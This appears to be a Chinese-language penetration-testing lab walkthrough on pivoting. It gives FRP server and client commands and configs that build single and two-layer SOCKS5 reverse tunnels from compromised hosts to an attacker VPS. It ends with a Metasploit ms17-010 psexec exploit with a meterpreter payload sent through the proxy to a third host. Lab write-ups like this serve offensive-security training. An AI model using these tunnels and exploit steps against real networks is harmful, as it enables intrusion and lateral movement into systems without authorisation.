Socks代理实战(FRP)

渗透场景

7d3fec2895a6ffa241bcbac1e7076e1f

测试Target1

  • 信息收集(同代理实战01)
  • 分析利用(同代理实战01)
  • 主机信息收集(同代理实战01)
  • 建立Socks代理

FRP建立Socks代理

  • 模拟VPS启动frps

VPS:192.168.0.132

1
2
3
4
5
# 启动frps
./frps -c frps.ini

# 查看frps配置文件
cat frps.ini
1
2
[common]
bind_port = 7000

image-20230914120330838

  • Target1启动frpc

Target1:192.168.0.133

1
2
3
4
5
# 启动frpc
./frpc -c frpc.ini

# 查看frpc配置文件
cat frpc.ini
1
2
3
4
5
6
7
[common]
server_addr = 192.168.0.132
server_port = 7000
[socks5]
type = tcp
plugin = socks5
remote_port = 10088

image-20230914120443861

测试Target2

  • 信息收集(同代理实战01)
  • 分析利用(同代理实战01)
  • 配置Socks代理连接Webshell(同代理实战01)
  • 主机信息收集(同代理实战01)
  • FRP建立二层Socks代理

FRP建立二层Socks代理

  • VPS启动frps

VPS:192.168.0.132

1
2
3
4
5
# 启动frps
./frps -c frps.ini

# 查看frps配置文件
cat frps.ini
1
2
[common]
bind_port = 7000
  • Target1启动frpc

Target1:192.168.1.195

1
2
3
./frpc -c frpc1.ini

cat frpc1.ini
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[common]
server_addr = 192.168.0.132
server_port = 7000

[socks5_1]
type = tcp
remote_port = 10801
plugin = socks5

[socks5_to_33]
type = tcp
local_ip = 127.0.0.1
local_port = 10089
remote_port = 10090
  • Target1启动frps
1
2
./frps -c frps1.ini
cat frps1.ini
1
2
[common]
bind_port = 7000
  • Target2启动frpc

Target2:192.168.33.22

1
2
./frpc -c frpc2.ini
cat frpc2.ini
1
2
3
4
5
6
7
[common]
server_addr = 192.168.22.11
server_port = 7000
[socks5_2]
type = tcp
plugin = socks5
remote_port = 10089

测试Target3

  • 信息收集
  • 分析利用

445端口:ms17-010

1
2
3
4
5
6
7
msfconsole
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set proxies socks5:47.101.214.85:1888
# setg proxies socks5:47.101.214.85:1888
set rhosts 192.168.33.33
exploit –j